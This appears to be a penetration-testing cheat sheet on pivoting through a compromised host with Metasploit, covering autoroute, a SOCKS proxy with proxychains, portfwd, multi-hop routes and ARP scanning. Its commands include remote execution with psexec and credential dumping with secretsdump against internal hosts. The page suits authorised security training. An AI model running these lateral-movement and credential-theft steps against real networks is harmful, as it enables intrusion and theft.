Pivoting
Overviewβ
Pivoting routes traffic through a compromised host to reach network segments not directly accessible from Kali. Metasploit supports three mechanisms:
| Method | What It Does | Best For |
|---|---|---|
route / autoroute | Tells MSF to send traffic through a session | Running MSF modules against internal hosts |
portfwd | Forwards a single port through a Meterpreter session | Accessing a specific service (RDP, SMB, web) |
| SOCKS proxy | Exposes a SOCKS5 proxy on Kali backed by a session | Routing arbitrary tools (Impacket, xfreerdp, nmap) through the pivot |
Use autoroute + SOCKS proxy together as the standard pivot setup - it gives both MSF modules and external tools access to the internal network.
autorouteβ
autoroute adds a routing entry in MSF that directs traffic for a given subnet through a specified session.
# From msfconsole (session already backgrounded)
msf6 > use post/multi/manage/autoroute
msf6 > set SESSION <ID>
msf6 > set SUBNET <TARGET_INTERNAL_SUBNET> # e.g., 10.10.10.0/24
msf6 > run
# Or run directly from inside Meterpreter
meterpreter > run post/multi/manage/autoroute SUBNET=10.10.10.0/24
# Auto-detect subnets from the pivot host's routing table
meterpreter > run post/multi/manage/autoroute CMD=autoadd
Verify routes:
msf6 > route print
Remove a route:
msf6 > route remove 10.10.10.0/24 <SESSION_ID>
SOCKS Proxyβ
Once routes are in place, a SOCKS proxy server lets external tools (Impacket, xfreerdp, proxychains, etc.) route through the MSF session to reach internal hosts.
msf6 > use auxiliary/server/socks_proxy
msf6 > set SRVPORT 1080
msf6 > set VERSION 5
msf6 > set SRVHOST 127.0.0.1
msf6 > run -j
Verify it's running:
msf6 > jobs
Configure proxychainsβ
Edit /etc/proxychains4.conf:
# Comment out any existing socks lines at the bottom, then add:
socks5 127.0.0.1 1080
Use proxychains with external toolsβ
# Nmap through pivot (TCP only - -sT required, no SYN scan through proxy)
proxychains nmap -sT -Pn -n -p 22,80,443,445,3389 10.10.10.50
# Impacket through pivot
proxychains impacket-psexec domain/Administrator:Password@10.10.10.50
proxychains impacket-secretsdump domain/Administrator:Password@10.10.10.50
# RDP through pivot
proxychains xfreerdp /v:10.10.10.50 /u:Administrator /d:DOMAIN /cert-ignore
proxychains only supports TCP. -sS (SYN) and -sU (UDP) scans will fail or produce inaccurate results. Always use -sT -Pn when scanning through a SOCKS proxy.
portfwdβ
portfwd is a quick single-service tunnel through an existing Meterpreter session. Useful when you don't need a full SOCKS proxy - just access to one specific port.
meterpreter > portfwd add -l <LOCAL_PORT> -p <REMOTE_PORT> -r <REMOTE_HOST>
Common portfwd Use Casesβ
# Access RDP on an internal host
meterpreter > portfwd add -l 13389 -p 3389 -r 10.10.10.50
xfreerdp /v:localhost:13389 /u:Administrator /cert-ignore
# Access SMB on an internal host
meterpreter > portfwd add -l 1445 -p 445 -r 10.10.10.50
impacket-psexec domain/Administrator:Password@127.0.0.1 -port 1445
# Access a web application on internal host
meterpreter > portfwd add -l 8080 -p 80 -r 10.10.10.100
# Browse: http://localhost:8080
# Access SSH on internal host
meterpreter > portfwd add -l 2222 -p 22 -r 10.10.10.50
ssh -p 2222 user@localhost
Manage forwards:
meterpreter > portfwd list
meterpreter > portfwd delete -l 13389
meterpreter > portfwd flush # Remove all forwards
Standard Pivot Setup Workflowβ
# 1. Get a session on the pivot host, background it
meterpreter > background
# 2. Add routes for the internal subnet
msf6 > use post/multi/manage/autoroute
msf6 > set SESSION 1
msf6 > set SUBNET 10.10.10.0/24
msf6 > run
# 3. Start SOCKS proxy
msf6 > use auxiliary/server/socks_proxy
msf6 > set SRVPORT 1080
msf6 > set VERSION 5
msf6 > set SRVHOST 127.0.0.1
msf6 > run -j
# 4. Run MSF modules against internal targets (routes handle this automatically)
msf6 > use auxiliary/scanner/smb/smb_version
msf6 > set RHOSTS 10.10.10.0/24
msf6 > run
# 5. Use proxychains for non-MSF tools
proxychains impacket-psexec domain/Administrator:Password@10.10.10.50
Multi-Hop Pivotingβ
If a second compromised host can reach a third subnet, add another route through the second session:
# Session 1 = first pivot (10.10.10.x)
# Session 2 = second pivot (10.20.20.x, reached through session 1)
msf6 > use post/multi/manage/autoroute
msf6 > set SESSION 2
msf6 > set SUBNET 10.20.20.0/24
msf6 > run
# SOCKS proxy already running on 1080 handles routing automatically
# proxychains tools can now reach 10.20.20.x through sessions 1 β 2
ARP Scanning Through a Sessionβ
Before running full scans, identify live hosts in the internal subnet using the pivot host's ARP table and a simple scan - less noisy than an Nmap sweep.
meterpreter > run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24
Or from a routed session:
msf6 > use auxiliary/scanner/discovery/arp_sweep
msf6 > set RHOSTS 10.10.10.0/24
msf6 > set SRHOSTS 10.10.10.1 # Source IP (pivot host address in that subnet)
msf6 > run